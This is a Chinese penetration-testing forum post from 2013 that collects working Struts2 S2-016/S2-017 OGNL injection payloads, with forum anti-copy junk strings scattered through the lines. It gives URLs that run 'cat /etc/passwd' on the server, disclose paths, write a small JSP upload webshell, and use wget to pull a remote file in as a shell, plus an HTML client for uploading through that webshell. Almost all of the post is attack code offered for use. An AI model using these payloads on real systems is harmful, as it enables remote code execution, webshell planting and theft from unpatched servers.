中国网络渗透测试联盟

标题: Struts2 S2-016/S2-017漏洞执行代码 [打印本页]
作者: admin    时间: 2013-7-18 23:03
标题: Struts2 S2-016/S2-017漏洞执行代码
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。
0 B' m7 ?- H2 W& K& H
# e( h- U6 Z: I- i: B喜欢就点一下感谢吧^_^& o) \1 [- @' {9 S% J

: y8 e; ]/ y, X带回显命令执行:, ~4 {: F$ x  j/ ]2 K

& p% N* V/ N  j4 H$ R9 K! Khttp://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}6 h$ ?# _# T+ d$ s# E

  {  R2 r1 B5 _( `2 T& s9 M5 c3 }7 a  k

! k" K) X' Q, a5 t: {' U/ M) \; m$ }

; P1 P9 ]6 }; B0 J
0 p; [' d' b5 m% X' L+ P( x
4 g6 f/ I5 w$ ~! @爆路径:
) l- K5 p$ d0 l2 ~' v" r
7 Q$ f( }8 u$ @7 v- |2 Z+ Rhttp://www.example.com/struts2-b ... 8%29.close%28%29%7D- [4 ]0 ~% d3 B$ N) M4 l: Q

9 ^3 e( K& _+ o6 J7 s4 o  I' I, G' F9 {6 s
) a1 z2 ]. Q) ?# B7 A7 @+ e

9 Y  s% T" e  N8 ^; w" `( Y2 [6 Q! o6 e
写文件:
0 [- w! ]1 `2 {- q) y( D$ @5 h1 m! n5 `1 ^
http://www.example.com/struts2-blank/example/X.action?redirect:${+ z7 K, v& `1 Q- X4 q
5 Y8 J. x9 `8 [  l2 M# |$ s4 k
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),( J# p, m4 o8 |" X+ v  y# f8 s

" o2 k% P2 g1 f+ D% a, \8 n%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),
6 J( s0 X/ b" K. E2 r* g; D5 {. H& j" z9 B$ O
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()2 R7 |* N6 u3 k! ^) D# r1 X' a8 g* F) C

- X! u! R8 u9 H}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
, {4 c' K2 c' I
9 n# l1 [+ Z! K4 B+ D
' R. G+ `& k  q& y* c
7 ]! z+ ]% J" R, |: ]' C5 w1 }& _+ s写入的文件内容:
5 |5 A" P- _/ Y: A+ A: X' `* L0 C- o# [/ v8 W; p# R8 ?
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>      
  Q7 |9 C% J/ @0 c" n/ Z% N- o
( m2 ^- w8 s& J0 M! m+ j# z其实就是一个jsp的小马,需要客户端配合                                                                                 
: ^( ^1 g; M; r6 R5 C9 r& z* D- t$ H$ z  T2 ^% @
函数f是文件名,t是内容
8 \0 y2 c# B; r! h7 ]& T7 c/ E4 \8 {
客户端:
4 P+ \; V. a% G7 b
. ^6 I3 O1 z& E8 k. B# B  ~  L: h<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">
, V9 k8 t, H4 c. M
7 e4 F7 T5 m$ X( i4 V: R( B7 Y<textarea name=t cols=120 rows=10 width=45>your code</textarea>3 ]" C* j7 }  ]* ?" M0 }
, o# [* r9 |6 b" C
<center>( L" l9 C! R: m6 G0 F
! B0 A9 X  c2 K5 T/ P1 R
8 A0 M7 R- o2 ~. f/ d' V' C
, A7 z8 I) s- V
<input type=submit value="提交">) B% U' E' V3 d1 M
- {' ^0 d& ]: d( M) l
</form>
5 v- l; E0 ?) H% {5 ?5 b9 G  r" G0 Y4 ^9 K: c0 D8 A; f
就在当前目录建立一个fjp.jsp
+ D' V! x* E& ?" v( z9 U+ W: U) E5 U5 u, ^9 J7 O' B+ ~2 f8 A
shell:http://www.example.com/struts2-blank/example/fjp.jsp
% q/ {2 \5 E, ^) v7 |% l; N4 U: R6 {, s/ D+ q4 Y( Y( \0 _- }

1 H( Y. q8 @, F
, ?3 ^/ @4 J- v, s7 }) e: Q6 u还有@园长的一个客户端:
7 ~# j1 i. ?& e% ^/ A2 g
* v/ c* Q. d6 R* N5 C" r; t<html>
% o* ~4 a' a! I- l0 e$ G1 o
9 f! [  U5 v. O! F4 ~4 w<head>
, X' N* z: V- _0 I6 H  O
5 R0 ~' s) N. U<meta http-equiv="content-type" content="text/html;charset=utf-8">
* N0 |# l: E# |! |9 H/ G8 U! n7 q: s' V2 f1 y4 ~
<title>jsp-园长</title>6 M: R. h# ]& @* [" U# z9 R7 k% D2 |
% v$ A8 y- D) G3 q4 |
</head>
# j! x8 G  H4 g) F1 c' a! o- F/ h* o: I" ^: Q$ \7 u
<style>
; p  o" C, h8 B. R& F7 G: i% U* w1 E/ e
.main{width:980px;height:600px;margin:0 auto;}
# q0 C! {; \- M  e
, C) W& |( E, Q5 \( ], |2 C.url{width:300px;}4 t! D: V; R+ P) E4 p

) s9 {" C, U4 q$ P# h  \.fn{width:60px;}; K+ z8 j- L" k1 F1 B
4 k# e+ m3 |* w* Z
.content{width:80%;height:60%;}: Y8 q2 _  I/ `+ {. D# J
8 H- b) H5 i5 e5 Y! w0 f
</style>: u5 H) x! N/ N
' |1 ?" x" \; }% ^; O9 L
<script>
2 ?, h1 w4 T6 ]; `8 |) G' |) b
+ n& W. N7 I! @% o9 u+ y  function upload(){
& Z# B# l3 t& g6 m+ F9 t5 q& c% d$ t: t
    var url = document.getElementById('url').value,7 d# h# I- _$ L) Z8 I

/ f* V/ a5 R  s3 H4 d4 b      content = document.getElementById('content').value,/ P. r4 [: m1 S- I" H

! S( @# D  m3 i, z$ X" B      fileName = document.getElementById('fn').value,
( ~  O: g1 L9 F1 m; g0 z+ q( V- A; d9 I+ h( C, `
      form = document.getElementById('fm');
( e% s: {/ _5 K- a+ C, o+ ]* J/ y: w" x+ k9 ~7 M4 g2 ~+ K
    if(url.length == 0){+ {: y1 J0 E* l

. U3 p) C7 T  u6 j% A1 _. q' ~      alert("Url not allowd empty!");5 t& E- V! u! p! ^

* H' w2 Z' G, f% q% \8 T      return ;7 @- X1 a+ w* k) C
5 O  p* ?% z% l0 L1 b! D- j
    }5 l1 C0 W  @( L; B/ K/ n, p2 o

; P$ ?" U! ^7 x$ C/ m1 A    if(content.length == 0){0 `5 G3 L7 H! l  F3 h* f
8 x7 R9 Q* f( i: ?+ ~( a
      alert("Content not allowd empty!");  a) p' [- C! Y) ~" L4 ?
  N/ Z6 }; `0 T, _3 \7 h2 B
      return ;
& X! {  x' {6 B- k
( W) W: x/ y" m4 ^6 u  G! W. T    }
6 v) M/ G" ]% h% ^* N& q5 b6 G4 S8 `7 ~4 x6 J7 \( w& x  U
    if(fileName.length == 0){5 \7 D( a9 ?/ Q% c! c

( z% R& K4 c' M7 g$ q      alert("FileName not allowd empty!");+ f/ y: m0 S5 D4 c
: w9 z3 ?# I  U1 ]$ ~+ s
      return ;
7 P& l1 \8 @2 V4 I
% j% c8 u) I% F1 ?+ b! N    }
. ?2 V0 G! H3 [: ?0 @) w9 H( _. P* i: a  {- _, H; U! r2 B
    form.action = url;
% R1 O: n; X9 r& O& W, P& ?$ c
3 u- ^1 r2 B- Q- _    form.submit();
, e$ E7 S5 R  z1 h1 Q+ I8 f* v! U) r# k" G% @8 |. j8 J# T, i7 o
  }( n1 ]& i5 s7 \
. A) O; [; I: a2 e5 c
</script>
& D) E5 L4 O& g/ C5 }8 [" ^# ]1 w, c# C$ C7 C4 q: Y
<body>
" \& f" t+ n; J$ I
5 L$ r. o% t6 F% L3 l<div class="main">
- a0 e9 ^. b+ |& ]/ R/ d  _/ \0 b, U3 g. U
  <form id="fm" method="post">  
- L. Y: E1 u) K6 B5 Y* z, V. o) g
    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>  
( m' K4 t" |& }8 M' j. y5 x5 X) t5 r+ ^; B+ U9 B5 z
    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  ( V2 k) [6 _, K' d3 H; X

  G2 t' o9 s/ W  f9 W  ]( q    <a href="javascript:upload();">Upload</a>
+ U' c4 l( e# F) [8 R/ u  x! i; u( ^2 M0 W  p8 u

2 l  b- v+ q8 w
1 i! Z' k, i, _+ D; y4 `$ H+ J5 l3 j    <textarea id="content" class="content" name="t" ></textarea>
) f# s9 Z3 B$ }+ b  S4 ~) N3 D
5 o) \# U& Z% Y  </form>
: n7 k1 g  D0 ?( ^4 D' P% j8 Q* u% m! V- u4 [* @
</div>
+ z0 q/ K- H1 Q1 l# ]+ A3 r, A9 ?: g
</body>
- U' p5 A/ h' [/ k; d3 p$ ]$ T5 c! {! I8 O- {' N/ T
</html>
& t+ C1 w1 A9 q" O1 W
1 t, t+ x3 a" v$ S9 r( A( S% V& h1 X  m# u8 z
. I1 g5 r  ~& T0 `# Z
还有@X发的一个wget的getshell
8 l7 x+ B$ f: Q) J' T3 s$ }7 |) E0 I5 H4 ?) ^: f6 Q: C. ^! {
?redirect{%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}
) @$ \* p: y& p( H, |' J& `
1 @# G3 {+ t! S5 G& X# h, T( z)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
# `1 y& S5 ~2 |1 Z& J0 }! v复制代码



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2